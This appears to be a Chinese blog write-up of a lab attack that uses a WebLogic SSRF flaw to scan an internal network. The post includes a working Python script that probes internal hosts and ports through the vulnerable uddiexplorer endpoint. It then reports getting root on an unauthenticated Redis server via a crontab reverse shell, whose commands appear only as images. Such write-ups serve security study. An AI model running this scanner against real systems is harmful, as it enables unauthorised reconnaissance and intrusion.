美文网首页
ssrf内网横向redis getshell

ssrf内网横向redis getshell

作者: xioooZorro | 来源:发表于2021-03-06 22:23 被阅读0次

漏洞环境

Weblogic 10.3版本
内网ip网段:172.26.0.0/24

ssrf 漏洞验证

此处可以利用有回显和无回显漏洞验证


image.png

漏洞利用:

  • 内网探测
    此处编写python脚本自动化扫描
import thread
import time
import re
import requests


def ite_ip(ip):
    for i in range(1, 256):
        final_ip = '{ip}.{i}'.format(ip=ip, i=i)
        print final_ip
        thread.start_new_thread(scan, (final_ip,))
        time.sleep(3)

def scan(final_ip):
    ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')
    for port in ports:
        vul_url = 'http://192.168.124.7:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)
        try:
            #print vul_url
            r = requests.get(vul_url, timeout=15, verify=False)
            result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)
            result2 = re.findall('but could not connect', r.content)
            result3 = re.findall('No route to host', r.content)
            if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
                print '[!]'+final_ip + ':' + port
        except Exception, e:
            pass


if __name__ == '__main__':
    ip = "172.26.0"
    if ip:
        print ip
        ite_ip(ip)
    else:
        print "no ip"

经探测内网存在redis数据库服务6379开放

image.png

redis 未授权

  • crontab计划任务反弹shell


    image.png
    image.png
    image.png

    至此,通过外网weblogic ssrf漏洞拿到内网redis数据库主机root权限。

相关文章

  • ssrf内网横向redis getshell

    漏洞环境 Weblogic 10.3版本内网ip网段:172.26.0.0/24 ssrf 漏洞验证 此处可以利用...

  • ssrf+redis 未授权访问导致getshell

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务...

  • 【漏洞复现】利用WebLogic SSRF漏洞攻击内网Redis

    0x01 复现环境 公网上存在WebLogic服务,存在SSRF漏洞内网中部署了一台Redis服务器,IP地址为1...

  • ssrf攻击内网应用

    一、weblogic ssrf攻击redis Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTT...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • 内网横向打靶

    遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危...

  • redis未授权访问写/etc/passwd

    学到个redis未授权访问getshell的新技巧,记录一下。 前提条件 redis以root身份运行 目标系统允...

  • Redis安全相关

    这几天在做一个SSRF的漏洞练习,看到例子是拿Redis做演示,就顺手整理了一下Redis的安全内容。 Redis...

  • CTFHUB Web SSRF

    SSRF [TOC] 一、内网访问 二、伪协议读取文件 三、端口扫描 四、POST请求 尝试直接访问flag.ph...

  • 记一次瑟情app渗透测试

    前言: 某个星期六的晚上,我还在挖 edusrc ,刚 getshell 内网漫游完(纯属放屁哈哈哈)准备下机睡觉...

网友评论

      本文标题:ssrf内网横向redis getshell

      本文链接:https://www.haomeiwen.com/subject/ywixiktx.html